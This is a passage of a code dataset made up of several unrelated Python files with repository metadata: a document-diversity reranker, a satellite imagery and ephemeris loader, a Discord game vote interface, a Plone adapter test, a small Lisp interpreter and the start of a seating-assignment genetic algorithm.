batch_chosen_docs.append(chosen_docs)\n\n return AgentBatchOutput(docs=batch_chosen_docs)\n\n\n@DiversityStrategy.register_subclass(\"topic\")\nclass Topic(DiversityStrategy):\n\n roberta = pipeline(\"text-classification\", model=\"cardiffnlp/tweet-topic-21-multi\", device=0)\n doc2label = {}\n\n def precompute(self, dataset: Dataset) -> None:\n labels = []\n for doc in tqdm(self.roberta(KeyDataset(dataset, \"text\"), batch_size=32, truncation=True, padding=\"max_length\", max_length=64), total=len(dataset)):\n labels.append(doc[\"label\"])\n texts = dataset[\"text\"]\n\n for text, label in zip(texts, labels):\n self.doc2label[text] = label\n\n def rerank(\n self,\n outputs: AgentBatchOutput,\n k: int\n ):\n\n batch_docs = []\n for i in range(len(outputs.docs)):\n\n docs = [outputs.docs[i][idx] for idx in reversed(np.argsort(outputs.doc_scores[i]).tolist())]\n \n labels = [None for _ in docs]\n idxs_to_query = []\n docs_to_query = []\n for i, doc in enumerate(docs):\n if doc in self.doc2label:\n labels[i] = self.doc2label[doc]\n else:\n idxs_to_query.append(i)\n docs_to_query.append(doc)\n\n topic_outputs = self.roberta(docs_to_query)\n\n labels_to_add = [s[\"label\"] for s in topic_outputs]\n for idx, label, doc in zip(idxs_to_query, labels_to_add, docs_to_query):\n labels[idx] = label\n self.doc2label[doc] = label\n\n assert all([l is not None for l in labels])\n\n chosen_docs = []\n chosen_labels = []\n for doc, label in zip(docs, labels):\n if label not in chosen_labels:\n chosen_docs.append(doc)\n chosen_labels.append(label)\n if len(chosen_docs) == k:\n break\n\n for doc in chosen_docs:\n if len(chosen_docs) == k:\n break\n chosen_docs.append(doc)\n\n assert len(chosen_docs) == k\n\n batch_docs.append(chosen_docs)\n\n return AgentBatchOutput(docs=batch_docs)\n\n\n@DiversityStrategy.register_subclass(\"mcvae\")\nclass MCVAE(DiversityStrategy):\n\n requires_doc_embeds = True\n \n def rerank(\n self, \n outputs: AgentBatchOutput, \n k: int\n ):\n\n\n embeds = self.config.embed_fn(\n torch.tensor(outputs.query_embed).to(self.config.device), num_samples=self.config.s\n ) # bsz x s x dim\n\n scores = torch.bmm(\n embeds, torch.tensor(outputs.doc_embeds).to(self.config.device).transpose(1, 2)\n )\n\n batch_docs = []\n for i in range(len(outputs.docs)):\n votes = scores[i].argmax(-1).cpu().numpy().tolist()\n vote_sums = [(j, votes.count(j)) for j in range(self.config.n)]\n vote_sums = list(reversed(sorted(vote_sums, key=lambda x: x[1])))[:k]\n vote_idxs, _ = zip(*vote_sums)\n docs = [outputs.docs[i][idx] for idx in vote_idxs]\n\n batch_docs.append(docs)\n\n return AgentBatchOutput(docs=batch_docs)\n\n\ndef _search(scores, docs, k, search_fn):\n idxs = search_fn(scores, k)\n score = np.mean(np.max(scores[list(idxs)], axis=0), axis=-1).item()\n best_answer = [docs[idx] for idx in idxs]\n\n return best_answer, score, idxs\n\n\ndef _rerank(policy_docs, world_docs, world_scores, k, search_fn, tau):\n scores = [compute_f1_matrix_fast(pd, wd) for pd, wd in zip(policy_docs, world_docs)]\n probs = [softmax(np.array(s) / tau) for s in world_scores]\n scores = [s * np.expand_dims(p, axis=0) for s, p in zip(scores, probs)]\n best_answer, score, idxs = zip(*[_search(s, docs, k, search_fn) for s, docs in zip(scores, policy_docs)])\n\n return best_answer, score, idxs\n\n\nclass SimSR(DiversityStrategy):\n\n @abstractmethod\n def run_search(self, scores, k):\n pass\n\n @staticmethod\n def _score_fn(scores):\n return np.mean(np.max(scores, axis=0), axis=-1).item()\n\n def rerank(self, outputs: AgentBatchOutput, k: int) -> AgentBatchOutput:\n # Check if we have enough documents to rerank\n # must be more than s and more than n to rerank\n if len(outputs.docs[0]) < self.config.s or len(outputs.docs[0]) < self.config.n:\n raise ValueError(\"Not enough documents to rerank\")\n\n # Sort outputs\n docs = outputs.docs\n if self.config.n != self.config.s:\n argsort = np.argsort(np.array(outputs.doc_scores), axis=-1)\n docs = [[outputs.docs[i][idx] for idx in argsort[i]] for i in range(argsort.shape[0])]\n \n world_docs = [D[-self.config.s:] for D in docs]\n world_scores = [S[-self.config.s:] for S in outputs.doc_scores]\n policy_docs = [D[-self.config.n:] for D in docs]\n\n if not is_ray_installed or not ray.is_initialized():\n best_answer, score, idxs = _rerank(\n policy_docs, \n world_docs, \n world_scores, \n k, \n self.run_search, \n self.config.tau\n )\n else:\n # Get number of workers\n num_workers = ray.cluster_resources().get(\"CPU\", 1)\n\n # Chunk through inputs to _rerank\n chunk_size = math.ceil(len(docs) / num_workers)\n chunks = [docs[i:i + chunk_size] for i in range(0, len(docs), chunk_size)]\n chunks = [[c, world_docs[i:i + chunk_size], world_scores[i:i + chunk_size], k, self.run_search, self.config.tau] for i, c in enumerate(chunks)]\n\n # Run _rerank in parallel\n results = [ray.remote(_rerank).remote(*c) for c in chunks]\n results = ray.get(results)\n\n # Unpack results\n best_answer, score, idxs = zip(*results)\n\n # Unchunk results\n best_answer = [a for b in best_answer for a in b]\n score = [s for s in score for _ in range(len(s))]\n idxs = [i for i in idxs for _ in range(len(i))]\n \n return AgentBatchOutput(\n docs=list(best_answer),\n score=list(score),\n doc_indices=list(idxs),\n topn_doc_indices=[I.tolist() for I in outputs.doc_indices],\n topn_docs=policy_docs,\n )\n\n\n@DiversityStrategy.register_subclass(\"sim_sr_greedy\")\nclass SimSRGreedy(SimSR):\n\n def run_search(self, scores, k):\n idxs = list(range(scores.shape[0]))\n chosen_idxs = []\n all_scores = []\n for _ in range(k):\n chosen_idxs, idxs, e_scores = self._get_idxs(scores, idxs, chosen_idxs)\n all_scores.append(e_scores)\n\n # Normalisation\n all_scores = [[np.round(s * 1000, 2) for s in S] for S in all_scores]\n chosen_idxs\n\n return chosen_idxs\n\n def _get_idxs(self, scores, idxs, chosen_idxs):\n e_scores = []\n for idx in idxs:\n if idx in chosen_idxs:\n e_scores.append(-1e10)\n continue\n tmp_idxs = chosen_idxs + [idx]\n S = scores[list(tmp_idxs)]\n red_penalty = np.max(scores[chosen_idxs, idx]) if len(chosen_idxs) > 0 else 0.0\n e_score = self._score_fn(S) - self.config.redundancy_penalty * red_penalty\n e_scores.append(e_score)\n\n best_idx = idxs[np.argmax(e_scores)] # Note: this is the idx in idxs, not in scores\n chosen_idxs.append(best_idx)\n\n return chosen_idxs, idxs, e_scores\n\n\n@DiversityStrategy.register_subclass(\"sim_sr_ablative\")\nclass SimSRAblative(SimSR):\n\n def run_search(self, scores, k):\n idxs = list(range(scores.shape[0])) \n\n while len(idxs) > k:\n best_score = -1.0\n best_idx = None\n for idx in idxs:\n tmp_idxs = copy.copy(idxs)\n tmp_idxs.remove(idx)\n\n S = scores[tmp_idxs]\n e_score = self._score_fn(S)\n\n best_score, best_idx = max([(best_score, best_idx), (e_score, idx)], key=lambda x: x[0])\n\n idxs.remove(best_idx)\n\n e_scores = scores.mean(axis=1)[idxs].tolist()\n\n # Resort idxs by score in descending order\n idxs = [x for _, x in sorted(zip(e_scores, idxs), key=lambda x: x[0], reverse=True)]\n\n return idxs\n\n\n@DiversityStrategy.register_subclass(\"sim_sr_ablative_gpu\")\nclass SimSRAblativeGPU(SimSR):\n\n \"\"\"\n A GPU-based implementation of ablative search.\n \"\"\"\n\n def rerank(self, outputs: AgentBatchOutput, k: int) -> AgentBatchOutput:\n # Check if we have enough documents to rerank\n # must be more than s and more than n to rerank\n if len(outputs.docs[0]) < self.config.s or len(outputs.docs[0]) < self.config.n:\n raise ValueError(\"Not enough documents to rerank\")\n\n # Sort outputs\n docs = outputs.docs\n if self.config.n != self.config.s:\n argsort = np.argsort(np.array(outputs.doc_scores), axis=-1)\n docs = [[outputs.docs[i][idx] for idx in argsort[i]] for i in range(argsort.shape[0])]\n \n world_docs = [D[-self.config.s:] for D in docs]\n world_scores = [S[-self.config.s:] for S in outputs.doc_scores]\n policy_docs = [D[-self.config.n:] for D in docs]\n\n if not is_ray_installed or not ray.is_initialized():\n scores = [compute_f1_matrix_fast(pd, wd) for pd, wd in zip(policy_docs, world_docs)]\n else:\n scores = [ray.remote(compute_f1_matrix_fast).remote(pd, wd) for pd, wd in zip(policy_docs, world_docs)]\n scores = ray.get(scores)\n\n probs = F.softmax(torch.tensor(world_scores).cuda() / self.config.tau, dim=-1).unsqueeze(1)\n scores = torch.tensor(np.array(scores)).cuda() * probs\n\n idxs = self.run_search(scores, k)\n best_answer = [[policy_docs[i][x] for x in idx] for i, idx in enumerate(idxs)]\n\n return AgentBatchOutput(\n docs=best_answer,\n doc_indices=idxs,\n topn_doc_indices=[I.tolist() for I in outputs.doc_indices],\n topn_docs=policy_docs,\n )\n\n def run_search(self, scores, k):\n \"\"\"\n scores is 3d tensor of shape (batch size, n, s)\n \"\"\"\n idxs = [list(range(scores.shape[1])) for _ in range(scores.shape[0])]\n\n scores = scores.unsqueeze(2).cuda().expand(-1, -1, scores.shape[1], -1) \n\n # Create a mask\n mask = torch.ones(scores.size()).cuda()\n for i in range(scores.shape[1]):\n mask[:, i, i, :] = 0.0\n\n best_idx_mask = torch.ones([scores.shape[0], scores.shape[1]]).cuda()\n\n # We will incrementally add to the mask\n while len(idxs[0]) > k:\n # Compute scores\n S = scores * mask\n S = S.max(1)[0].mean(-1)\n\n # The best idx is the one that led to the highest score when it\n # was removed.\n best_idxs = torch.argmax(S * best_idx_mask, dim=-1)\n for i, (best_idx, idx) in enumerate(zip(best_idxs, idxs)):\n idxs[i].remove(best_idx)\n\n # Update the masks\n mask[i, best_idx, :, :] = 0.0\n best_idx_mask[i, best_idx] = 0.0\n\n # Check that we have the right number of idxs\n assert len(idxs[0]) == k\n\n return idxs\n","repo_name":"BenjaminTowle/STAR","sub_path":"src/agents/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":14183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33457441988","text":"import os\nimport pickle\nimport numpy as np # print (np.__version__) gives 1.18.4\nfrom osgeo import gdal\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport xml.etree.ElementTree as ET\nimport pandas as pd\n\nfrom linecache import getline\nfrom math import radians, sin, cos\nfrom utilities import rot\nfrom color_balance import simplest_cb\n\n\nclass DEM:\n def __init__(self, filePath):\n # initialize\n self.filePath = filePath\n self.cols = 0.0\n self.rows = 0.0\n self.xlucorner = 0.0\n self.ylucorner = 0.0\n self.cellsize = 0.0\n self.nodata_value = 0.0\n self.avg = 0.0 # 平均高程\n\n def loadDem(self):\n # Open the file:\n (dirName, extension) = os.path.splitext(self.filePath)\n\n # deal with headers \n hdr = [getline(self.filePath, i) for i in range(1, 7)] # type(hdr) gives \n values = [float(h.split(\" \")[-1].strip()) for h in hdr]\n # split h with \" \"(space), get the rightmost value and delete unnecessary space with strip\n\n self.cols, self.rows, xllcorner, yllcorner, self.cellsize, self.nodata_value = values\n self.xlucorner = xllcorner\n self.ylucorner = yllcorner + self.cellsize * self.rows\n\n # asc to .pkl \n while True:\n try: # if .pkl exists\n with open(dirName + '.pkl', 'rb') as f:\n DEM = pickle.load(f)\n # print(type(DEM)) gives # DEM.shape gives (5555, 5922)\n self.avg = np.nanmean(DEM) # gives 109.46928947586392\n f.close()\n break\n\n except IOError: # if not\n arr = np.loadtxt(self.filePath,\n skiprows=6) # Load the asc ndarray into a numpy array # arr.shape gives (5555, 5922)\n arr = np.where(arr == -9999.0, np.nan,\n arr) # replace -9999.0 with nan in order to calculate the average of DEM\n\n with open(dirName + '.pkl', 'wb') as f: # then save it as .pkl\n pickle.dump(arr, f)\n f.close()\n\n return DEM # \n\n \"\"\" 在main程式中\n DEM.getDemdict('cols')\n 可以被 DEM.__dict__['cols'] 取代\n \"\"\"\n # def getDemdict(self, arg):\n # DEMdict = {\n # 'cols' : self.DEMcols,\n # 'rows' : self.DEMrows,\n # 'xlucorner' : self.DEMxlucorner,\n # 'ylucorner' : self.DEMylucorner,\n # 'cellsize' : self.DEMcellsize,\n # 'nodata_value' : self.DEMnodata_value,\n # 'avg' : self.DEMavg\n # }\n # return DEMdict.get(arg, lambda: 'Invalid arguments')\n\n\nclass Tif:\n def __init__(self, filePath):\n # initialize\n self.filePath = filePath\n self.cols = 0.0\n self.rows = 0.0\n self.bands = 0.0\n self.xlucorner = 0.0\n self.ylucorner = 0.0\n self.cellsize = 0.0\n self.nodata_value = 0.0\n\n def loadTif(self):\n # Open the file:\n (dirName, extension) = os.path.splitext(self.filePath)\n tiff = gdal.Open(self.filePath) # type(tiff) gives \n\n # Dimensions\n self.cols = tiff.RasterXSize # 7402\n self.rows = tiff.RasterYSize # 6944\n self.bands = tiff.RasterCount # Number of bands gives 4\n self.xlucorner = tiff.GetGeoTransform()[0] # gives 195680.0\n self.ylucorner = tiff.GetGeoTransform()[3] # gives 2695132.0\n self.cellsize = tiff.GetGeoTransform()[1] # gives 4.0\n\n # tiff to .pkl \n while True:\n try: # if .pkl exists\n with open(dirName + '.pkl', 'rb') as f:\n Tif = pickle.load(f) # type(Tif) gives \n # plt.imshow(Tif)\n # plt.show()\n f.close()\n break\n\n except IOError: # if not\n\n b = tiff.GetRasterBand(1).ReadAsArray() # np.max(b) gives 16\n g = tiff.GetRasterBand(2).ReadAsArray()\n r = tiff.GetRasterBand(3).ReadAsArray()\n\n # normalize color to 0~255 # b.dtype gives float64\n b = (b / np.amax(b)) * 255\n g = (g / np.amax(g)) * 255\n r = (r / np.amax(r)) * 255\n\n bgr = np.dstack((b, g, r))\n bgr = bgr.astype(np.uint8) # float64 => unit8\n bgr = simplest_cb(bgr) # color balance # bgr.shape gives (6944, 7402, 3)\n\n rgb = bgr[:, :, ::-1] # cv2 讀圖片時是BGR, 而 matplotlib 是RGB\n # plt.imshow(rgb)\n # plt.show()\n\n with open(dirName + '.pkl', 'wb') as f: # save the RGB ndarray as .pkl\n pickle.dump(rgb, f)\n f.close()\n\n return Tif # type(Tif) gives # rgb\n\n \"\"\" 在main程式中\n Tif.getDemdict('cols')\n 可以被 Tif.__dict__['cols'] 取代\n \"\"\"\n # def getTifdict(self, arg):\n # Tifdict = {\n # 'cols' : self.Tifcols,\n # 'rows' : self.Tifrows,\n # 'xlucorner' : self.Tifxlucorner,\n # 'ylucorner' : self.Tifylucorner,\n # 'cellsize' : self.Tifcellsize,\n # 'band' : self.bands\n # }\n # return Tifdict.get(arg, lambda: 'Invalid arguments')\n\n\nclass Eph:\n def __init__(self, filePath):\n self.filePath = filePath\n\n def loadEph(self): # load eph information in .dim\n from coordinateSystem import CoordinateSystem\n cs = CoordinateSystem()\n\n meta_tree = ET.parse(self.filePath)\n root = meta_tree.getroot()\n\n ecef_List = []\n eph = pd.DataFrame(columns=['time', 'Lat', 'Lon', 'sat_h', 'TM2_X', 'TM2_Y'])\n\n # read position values of sat pos (in ecef) and time in .dim file then append to list\n for points in root.findall('Data_Strip/Ephemeris/Corrected_Ephemeris/Point_List/'):\n ecef_List.append([float(points.find('Location/X').text),\n float(points.find('Location/Y').text),\n float(points.find('Location/Z').text)])\n eph = eph.append({'time': points.find('TIME').text}, ignore_index=True)\n\n # coordinate transformation\n for i in range(len(ecef_List)):\n # ecef X Y Z to llh then save to dataframe eph\n lat, lon, h = cs.ecef_to_llh(ecef_List[i])\n eph.at[i, 'Lat'] = lat\n eph.at[i, 'Lon'] = lon\n eph.at[i, 'sat_h'] = h # 橢球高 (要加上大地起伏N 和 LVD offset 才是在TWD97座標下的 衛星高度 )\n\n # llh to TWD97 TM2 then save to dataframe eph\n TM2_X, TM2_Y = cs.LatLon_To_TWD97TM2(lat, lon)\n eph.at[i, 'TM2_X'] = TM2_X\n eph.at[i, 'TM2_Y'] = TM2_Y\n\n # read orientation values of sat pos (in ecef)\n for idx, row in eph.iterrows():\n for angle in root.findall('Data_Strip/Attitudes/Corrected_Attitudes/ECF_Attitude/Angle_List/'):\n if angle.find('TIME').text == row['time']:\n\n R = float(angle.find('ROLL').text)\n P = float(angle.find('PITCH').text)\n Y = float(angle.find('YAW').text)\n rotRPY = rot(Y, 3).dot(rot(P, 2).dot(rot(R, 1))) # form rotation matrix\n\n # turn rotation matrix from ecef coordinate system to local TWD97 TM2\n Z = np.array(ecef_List[idx]) # position of s in ecef (X、Y、Z)\n unit_Z = Z / np.linalg.norm(Z) # unit Z vector\n\n satLat_rad, satLon_rad = radians(row['Lat']), radians(row['Lon'])\n X = np.array([- sin(satLon_rad), cos(satLon_rad), np.linalg.norm(Z) * sin(satLat_rad)])\n unit_X = X / np.linalg.norm(X)\n\n Y = np.cross(unit_Z, unit_X)\n unit_Y = Y / np.linalg.norm(Y)\n\n ecef_X = np.array([1, 0, 0])\n ecef_Y = np.array([0, 1, 0])\n ecef_Z = np.array([0, 0, 1])\n\n R = np.array([[unit_X.dot(ecef_X), unit_X.dot(ecef_Y), unit_X.dot(ecef_Z)],\n [unit_Y.dot(ecef_X), unit_Y.dot(ecef_Y), unit_Y.dot(ecef_Z)],\n [unit_Z.dot(ecef_X), unit_Z.dot(ecef_Y), unit_Z.dot(ecef_Z)]\n ])\n\n rotOPK = np.transpose(R).dot(rotRPY)\n # then save all the elements to dataframe eph\n eph.at[idx, 'r11'] = rotOPK[0, 0]\n eph.at[idx, 'r12'] = rotOPK[0, 1]\n eph.at[idx, 'r13'] = rotOPK[0, 2]\n eph.at[idx, 'r21'] = rotOPK[1, 0]\n eph.at[idx, 'r22'] = rotOPK[1, 1]\n eph.at[idx, 'r23'] = rotOPK[1, 2]\n eph.at[idx, 'r31'] = rotOPK[2, 0]\n eph.at[idx, 'r32'] = rotOPK[2, 1]\n eph.at[idx, 'r33'] = rotOPK[2, 2]\n\n return eph # type(eph) gives \n\n\nif __name__ == '__main__':\n DEM = DEM('C:/Users/ChihYu/Desktop/ToNCKU_imagedata/台中.asc')\n Tif = Tif('D:/shortcut/pleiades2017_ms_twd97-2.tif')\n # 'D:/shortcut/FS5_G010_MS_L4TWD97_20191108_030233.tif'\n\n Eph = Eph(\n 'C:/Users/ChihYu/Desktop/ToNCKU_imagedata/FS5_20191108/MS_L1A/FS5_G010_MS_L1A_20191108_030233'\n '/FS5_G010_MS_L1A_20191108_030233.dim')\n\n dem = DEM.loadDem()\n tif = Tif.loadTif()\n eph = Eph.loadEph()\n # print(eph)\n","repo_name":"May7331/NSPO-Formosat-8","sub_path":"src/loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24444744935","text":"# https://github.com/bijij/BotBot\n\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nimport discord\nfrom discord import Member as User\n\nfrom ..game import Player, VoteGameState\nfrom .input import InputUI\n\nif TYPE_CHECKING:\n from .game import GameUI\n\n\n__all__ = (\"VoteUI\",)\n\n\ndef format_list(\n string: str,\n *ls: Any,\n singular: str = \"has\",\n plural: str = \"have\",\n oxford_comma: bool = True,\n) -> str:\n if not ls:\n return string.format(\"no-one\", singular)\n if len(ls) == 1:\n return string.format(ls[0], singular)\n\n *rest, last = ls\n rest_str = \", \".join(str(item) for item in rest)\n return string.format(rest_str + \",\" * oxford_comma + \" and \" + str(last), plural)\n\n\nclass VoteUI(InputUI):\n def __init__(self, game: GameUI, voters: list[Player[User]]) -> None:\n self.voters = voters\n super().__init__(game)\n\n @property\n def content(self) -> str:\n if not isinstance(self.game.game.state, VoteGameState):\n raise AssertionError\n return format_list(self.game.game.state.tooltip + \"\\nCurrently: {0} {1} voted.\", *self.votes)\n\n @property\n def votes(self) -> dict[Player[User], bool]:\n if isinstance(self.game.game.state, VoteGameState):\n return self.game.game.state.votes\n return {}\n\n async def interaction_check(self, interaction: discord.Interaction) -> bool:\n player = self.game.game.get_player(interaction.user)\n if player not in self.voters:\n await interaction.response.send_message(\"You cannot participate in this vote.\", ephemeral=True)\n return False\n if player in self.votes:\n await interaction.response.send_message(\"You have already voted.\", ephemeral=True)\n return False\n return True\n\n async def vote(self, interaction: discord.Interaction, vote: bool) -> None:\n await self.game.store_interaction(interaction)\n\n player = self.game.game.get_player(interaction.user)\n if player is None:\n msg = \"How?\"\n raise RuntimeError(msg)\n self.votes[player] = vote\n\n if self.game.game.state.ready:\n self.game.waiting.set()\n\n await interaction.message.edit(content=self.content, view=self)\n\n @discord.ui.button(label=\"ja!\", style=discord.ButtonStyle.danger)\n async def ja(self, item: discord.ui.Button, interation: discord.Interaction) -> None:\n return await self.vote(interation, True)\n\n @discord.ui.button(label=\"nein!\", style=discord.ButtonStyle.primary)\n async def nein(self, item: discord.ui.Button, interation: discord.Interaction) -> None:\n return await self.vote(interation, False)\n","repo_name":"rtk-rnjn/Parrot","sub_path":"interactions/buttons/secret_hitler/ui/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"77"} +{"seq_id":"43692041901","text":"from ftw.publisher.core.interfaces import IDataCollector\nfrom ftw.publisher.core.testing import ZCML_LAYER\nfrom ftw.testing import MockTestCase\nfrom Products.PloneFormGen.content.fields import HtmlTextField\nfrom Products.PloneFormGen.interfaces import IPloneFormGenField\nfrom zope.component import getAdapter\n\n\nclass TestPloneFormGenFGFieldAdapter(MockTestCase):\n\n layer = ZCML_LAYER\n\n def setUp(self):\n super(TestPloneFormGenFGFieldAdapter, self).setUp()\n\n self.obj = self.providing_stub(\n [IPloneFormGenField])\n self.obj.UID().return_value = 'some-uid'\n\n def test_component_registered_and_implements_interface(self):\n component = getAdapter(self.obj, IDataCollector,\n name='plone_form_gen_fg_field_adapter')\n\n self.assertTrue(\n IDataCollector.providedBy(component),\n 'PloneFormGen field adapter is not registered properly')\n\n def test_getData(self):\n field = HtmlTextField()\n field.default = \"
some html
\"\n\n self.obj.fgField = field\n component = getAdapter(self.obj, IDataCollector,\n name='plone_form_gen_fg_field_adapter')\n\n self.assertEquals(\n {'fgField': '
some html
'},\n component.getData())\n\n def test_setData(self):\n field = HtmlTextField()\n field.default = \"
some html
\"\n\n self.obj.fgField.side_effect = field\n component = getAdapter(self.obj, IDataCollector,\n name='plone_form_gen_fg_field_adapter')\n\n component.setData({'fgField': '
new html
'}, {})\n\n self.assertEquals('
new html
', self.obj.fgField.default)\n","repo_name":"4teamwork/ftw.publisher.core","sub_path":"ftw/publisher/core/tests/test_plone_form_gen_fg_field_adapter.py","file_name":"test_plone_form_gen_fg_field_adapter.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"30376302534","text":"# Laryssa Revelli\r\n# A01979841\r\nfrom random import random, randint\r\nimport os\r\nPATH = \"C:/Users/lreesa/cs4700/Assn10/\"\r\nif not os.path.exists(PATH):\r\n os.makedirs(PATH)\r\n\r\nIndex = 0\r\nBindings = {}\r\nReservedWords = ['+', '-', '*', '/', 'if', 'and', 'or', 'not', '>', 'eq', 'def', 'set', 'True', 'False']\r\nOperatorsAll = ['+', '-', '*', '/', 'if', 'and', 'or', 'not', '>', 'eq', 'set', 'def']\r\nOperatorsBoolBool = ['and', 'or', 'not', 'eq']\r\nOperatorsBoolNumb = ['>', 'eq']\r\nOperatorsNumb = ['+', '-', '*', '/']\r\nOperatorsDeclaritive = ['set', 'def']\r\nNumberOfArguments = {}\r\nArgumentCount = [(1, ['not']),(2, ['+', '-', '*', '/', '>', 'and', 'or', 'eq', 'set']), (3, ['if', 'def'])]\r\n# # fill the mapping from operator to argument count\r\nfor (count, operators) in ArgumentCount:\r\n for op in operators:\r\n NumberOfArguments[op] = count\r\n\r\ndef atom(token): \r\n # changes a token to an actual integer or boolean\r\n if token.isdigit():\r\n return int(token)\r\n if token == 'True' :\r\n return bool(token)\r\n if token == 'False':\r\n return not bool(token)\r\n return token\r\n\r\n### takes a program string and returns a parse tree\r\ndef parse(programStr):\r\n # returns the input string as a parse tree, represented as either an int or a list of expressions\r\n return createParseTree(tokenize(programStr))\r\n \r\n### does error checking\r\ndef parseX(programStr):\r\n # returns the input string as a parse tree, represented as either an int or a list of expressions\r\n return createParseTreeX(tokenize(programStr))\r\n\r\ndef createParseTree(tokenList):\r\n token = tokenList.pop(0)\r\n if isinstance(token, int) or isinstance(token, bool):\r\n return token\r\n operator = tokenList.pop(0) \r\n parseTree = [operator]\r\n for i in range(NumberOfArguments[operator]):\r\n parseTree += [createParseTree(tokenList)]\r\n tokenList.pop(0) # pop the ')'\r\n return parseTree\r\n \r\ndef createParseTreeX(tokenList):\r\n if tokenList == []:\r\n raise Exception(\"Run out of tokens\")\r\n token = tokenList.pop(0)\r\n if isinstance(token, int) or isinstance(token, bool):\r\n return tokenList\r\n if not token == \"(\":\r\n raise Exception(\"Found %s instead of (\" % (token,))\r\n if tokenList == []:\r\n raise Exception(\"Missing Operator\")\r\n operator = tokenList.pop(0) \r\n if not operator in OperatorsAll:\r\n raise Exception(\"Unknown operator %s\" % operator)\r\n parseTree = [operator]\r\n for i in range(NumberOfArguments[operator]):\r\n parseTree += [createParseTree(tokenList)]\r\n if tokenList == []:\r\n raise Exception(\"Missing )\")\r\n close = tokenList.pop(0) # pop the ')'\r\n if not ')' == close: # pop the ')'\r\n raise Exception(\"Found %s instead of )\" % (close,))\r\n return parseTree\r\n\r\n### takes a program string and evaluates\r\ndef evalL(programStr):\r\n # returns the solution of expressions\r\n try:\r\n return evaluate(createParseTree(tokenize(programStr)))\r\n except Exception as error:\r\n print(error)\r\n\r\ndef evaluate(parseTree):\r\n if isinstance(parseTree, int):\r\n return parseTree\r\n if isinstance(parseTree, bool):\r\n return parseTree\r\n if parseTree in Bindings: #vars\r\n return Bindings[parseTree]\r\n operator = parseTree[0]\r\n if operator == '+':\r\n return evaluate(parseTree[1]) + evaluate(parseTree[2])\r\n if operator == '-':\r\n return evaluate(parseTree[1]) - evaluate(parseTree[2])\r\n if operator == '*':\r\n return evaluate(parseTree[1]) * evaluate(parseTree[2])\r\n if operator == '/':\r\n divisor = evaluate(parseTree[2])\r\n if divisor == 0:\r\n raise Exception('Cannot divide by 0')\r\n else:\r\n return evaluate(parseTree[1]) / divisor\r\n if operator == 'not':\r\n return not evaluate(parseTree[1])\r\n if operator == 'and':\r\n return evaluate(parseTree[1]) and evaluate(parseTree[2])\r\n if operator == 'or':\r\n return evaluate(parseTree[1]) or evaluate(parseTree[2])\r\n if operator == '>':\r\n return evaluate(parseTree[1]) > evaluate(parseTree[2])\r\n if operator == 'eq':\r\n return evaluate(parseTree[1]) == evaluate(parseTree[2])\r\n if operator == 'if':\r\n if evaluate(parseTree[1]):\r\n return evaluate(parseTree[2])\r\n else:\r\n return evaluate(parseTree[3])\r\n if operator == 'set':\r\n Bindings[parseTree[1]] = evaluate(parseTree[2])\r\n if operator == 'def':\r\n Bindings[parseTree[1]] = parseTree[2:]\r\n if operator in Bindings:\r\n (args, body) = Bindings[operator]\r\n for i in range(len(args)):\r\n Bindings[args[i]] = evaluate(parseTree[i+1])\r\n for j in range(len(body)-1):\r\n evalL(body[j])\r\n return evalL(body[-1])\r\n\r\ndef quote(parseTree):\r\n return parseTree\r\n\r\n \r\n### very simple code that just checks whether the number of open parentheses\r\n### is the same as the number of closed parentheses\r\ndef checkBalanced(tokenList):\r\n depth = 0\r\n while not tokenList == []:\r\n token = tokenList.pop(0)\r\n if token == '(': #consume and add 1 to depth\r\n depth = depth + 1\r\n if token == ')':\r\n depth = depth - 1\r\n return depth == 0\r\n \r\n### takes a string representing an expression in simple lisp and returns a list of tokens\r\ndef tokenize(programStr):\r\n tokens = programStr.replace('(', ' ( ').replace(')', ' ) ').split()\r\n if all(legalToken(token) for token in tokens):\r\n return [atom(token) for token in tokens]\r\n else:\r\n badTokens = str([token for token in tokens if not legalToken(token)])[1:][:-1]\r\n raise Exception(\"Unknown token found %s\" % (badTokens,))\r\n \r\n### returns True if the token is legal \r\ndef legalToken(token):\r\n # returns True if legal for our simple lisp\r\n return (token.isdigit() or token == 'True' or token == 'False'\r\n or token in OperatorsAll + [')', '(']\r\n or isinstance(token, str)) #vars\r\n\r\nevalL('(set var 7)')\r\nprint(Bindings[var])","repo_name":"lreesa/cs4700-Programming-languages","sub_path":"Assn10/eLInterpreter.py","file_name":"eLInterpreter.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28786388684","text":"import boto3\nimport json\nimport decimal\n\ndynamodb = boto3.resource('dynamodb')\n\nclass CustomEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, set):\n return list(o)\n if isinstance(o, decimal.Decimal):\n if o % 1 > 0:\n return float(o)\n else:\n return int(o)\n return super(CustomEncoder, self).default(o)\n\ndef lambda_handler(event, context):\n table = dynamodb.Table('Jobs')\n response = table.scan()\n jsonString = json.dumps(response['Items'], cls=CustomEncoder)\n itemsObject = json.loads(jsonString)\n\n result = {}\n items = []\n\n for item in itemsObject:\n lowerCaseDict = {k.lower(): v for k, v in item.items()}\n items.append(lowerCaseDict)\n\n \n result['items'] = sorted(items, key=lambda x : x['id'])\n\n return result","repo_name":"mikeacosta/task-abstract","sub_path":"src/GetJobs.py","file_name":"GetJobs.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"47915532823","text":"import random\r\nfrom Matrix import GuestPair\r\n\r\nparents = []\r\noffsprings = []\r\n\r\noptimal = []\r\n\r\ndef initialization(guest, table):\r\n print(\"====INITIALIZATION====\\nRandom seating assignments\")\r\n for t in range(0,len(table)):\r\n print(\"Table %s:\" %(table[t].displayNumber()))\r\n for i in range(0,5):\r\n try:\r\n g = random.choice(guest)\r\n 